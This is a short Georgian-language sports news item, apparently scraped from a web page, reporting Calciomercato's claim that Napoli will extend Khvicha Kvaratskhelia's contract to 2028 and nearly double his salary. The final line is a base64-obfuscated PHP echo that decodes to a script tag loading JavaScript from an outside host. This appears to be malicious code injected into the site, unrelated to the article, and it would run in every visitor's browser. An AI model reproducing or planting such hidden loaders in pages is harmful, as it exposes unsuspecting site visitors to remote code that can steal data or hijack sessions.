celsiusi
ავერსი შნაიდერი

ხვიჩა კვარაცხელია კონტრაქტს ერთი წლით გაახანგრძლივებს და გაორმაგებულ ხელფასს მიიღებს – ინფორმაციას იტალიური გამოცემა Calciomercato ავრცელებს.

„ხვიჩა კვარაცხელიამ „ნაპოლის“ ჩემპიონობაში გადამწყვეტი როლი ითამაშა. ამიტომ მნიშვნელოვანი იყო მასთან კონტრაქტის გახანგრძლივება, რაზეც „ნაპოლის“ პრეზიდენტი აურელიო დე ლაურენტისი თვეების განმავლობაში ლაპარაკობდა.

2022 წელს ჩამოსულ ქართველს კლუბთან კონტრაქტი 2027 წლამდე აკავშირებს, მაგრამ თავისი თამაშით გუნდზე და, ზოგადად, საფეხბურთო სამყაროზე დიდი გავლენა მოახდინა. ამიტომ „ნაპოლიმ“ ახალი კონტრაქტის შეთავაზებით მისი შენარჩუნება გადაწყვიტა.

ახალი კონტრაქტი 2028 წლამდე იქნება გაფორმებული. მიმდინარეობს მუშაობა მოთამაშის პირობების გაუმჯობესებაზეც – მოქმედი ხელშეკრულებით კვარაცხელია წელიწადში 1,3 მლნ ევროს იღებს. ახალი შეთანხმებით კი „ნაპოლი“ ქართველს წელიწადში 2,5 მილიონ ევროს სთავაზობს: ეს მნიშვნელოვანი პროგრესია, თუ გავითვალისწინებთ, რომ პირველი ხელშეკრულების გაფორმებიდან მხოლოდ ერთი წელი გავიდა. მხარეები შეთანხმებასთან ძალიან ახლოს არიან და, წესით, კონტრაქტიც მალე გახანგრძლივდება“, – წერს Calciomercato.

ავტორი
სანდრო ჭითანავა
368
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");